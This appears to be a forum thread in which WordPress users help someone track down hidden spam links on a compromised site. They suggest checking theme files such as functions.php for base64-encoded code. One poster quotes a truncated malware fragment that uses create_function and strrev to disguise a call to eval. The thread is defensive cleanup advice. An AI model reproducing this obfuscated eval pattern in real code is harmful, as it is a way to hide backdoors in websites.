indianfreak
Senior Member
- Jan 4, 2008
- 811
- 533
I've got a folder "js_composer" in my plugins folder. Is it legit? I thought it comes with WPBakery Visual Composer.
Its probably in the theme's .php files like header.php or functions.php. Base64 or reverse base 64 encoding is what I suspect.
The folder is legit .I've got a folder "js_composer" in my plugins folder. Is it legit? I thought it comes with WPBakery Visual Composer.
you could download an offline copy of your site, then use an advanced file search to look for one of the links, see what php file they are being posted in. If nothing comes up, then some code is being used somewhere to hide the links in your sites sql database.
i'm just going to my bed, so hopefully a few people can pick things up, depending what you find on that file search.
I'll check back in the morning though. Good luck.
Please send me a PM. I can help you out. Faced similar issue with site. Try scanning with Anti malware plugin.@cyber.surfer sent you a PM. Thanks.![]()
How did you get on then?
Thanks man. I need a lot of it.I don't know buddy. But good luck![]()
$wp_user_functions_init = create_function('$a',strrev(';)a$(lave'));
$wp_user_functions_init(strrev(';))"
I got a similar problem witha client of mine last week.
Look for functions.php in your template folder and delete the base 64 encoding stuff.
Mine looked like this
.PHP:$wp_user_functions_init = create_function('$a',strrev(';)a$(lave')); $wp_user_functions_init(strrev(';))"
Hope it helps.